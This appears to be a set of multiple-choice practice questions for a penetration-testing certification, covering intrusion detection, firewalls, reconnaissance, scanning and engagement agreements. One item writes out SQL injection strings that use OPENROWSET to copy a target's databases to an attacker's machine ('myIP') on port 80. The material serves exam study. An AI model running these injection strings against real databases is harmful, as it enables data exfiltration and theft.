When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?
A. Passive IDS
B. Active IDS
C. Progressive IDS
Which of the following is not a characteristic of a firewall?
A. Manages public access to private networked resources
B. Routes packets between the networks
C. Examines all traffic routed between the two networks to see if it meets certain criteria
D. Filters only inbound traffic but not outbound traffic
Which of the following information gathering techniques collects information from an organization's web-based calendar and email services?
A. Anonymous Information Gathering
B. Private Information Gathering
C. Passive Information Gathering
D. Active Information Gathering
Amazon Consulting Corporation provides penetration testing and managed security services to
companies. Legality and regulatory compliance is one of the important components in conducting a
successful security audit.
Before starting a test, one of the agreements both the parties need to sign relates to limitations,
constraints, liabilities, code of conduct, and indemnification considerations between the parties.
Which agreement requires a signature from both the parties (the penetration tester and the company)?
A. Non-disclosure agreement
B. Client fees agreement
C. Rules of engagement agreement
D. Confidentiality agreement
What information can be collected by dumpster diving?
A. Sensitive documents
B. Email messages
C. Customer contact information
D. All the above
A penetration tester tries to transfer the database from the target machine to a different machine. For this,
he uses OPENROWSET to link the target database to his own database, replicates the database
structure, and transfers the data to his machine by via a connection to the remote machine on port 80.
The query he used to transfer databases was:
'; insert into OPENROWSET
('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from
mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases The query he used to
transfer table 1 was:
'; insert into OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1')
select * from database..table1
What query does he need in order to transfer the column?
A. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables
B. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows
C. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns
D. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_tables.dbo.syscolumns
A firewall's decision to forward or reject traffic in network filtering is dependent upon which of the following?
A. Destination address
B. Port numbers
C. Source address
D. Protocol used
Identify the policy that defines the standards for the organizational network connectivity and security standards for computers that are connected in the organizational network.
A. Information-Protection Policy
B. Special-Access Policy
C. Remote-Access Policy
D. Acceptable-Use Policy
Which one of the following scans starts, but does not complete the TCP handshake sequence for each port selected, and it works well for direct scanning and often works well through firewalls?
A. SYN Scan
B. Connect() scan
C. XMAS Scan
D. Null Scan
Security auditors determine the use of WAPs on their networks with Nessus vulnerability scanner which identifies the commonly used WAPs. One of the plug-ins that the Nessus Vulnerability Scanner uses is ID #11026 and is named "Access Point Detection". This plug-in uses four techniques to identify the presence of a WAP. Which one of the following techniques is mostly used for uploading new firmware images while upgrading the WAP device?
A. NMAP TCP/IP fingerprinting
B. HTTP fingerprinting
C. FTP fingerprinting
D. SNMP fingerprinting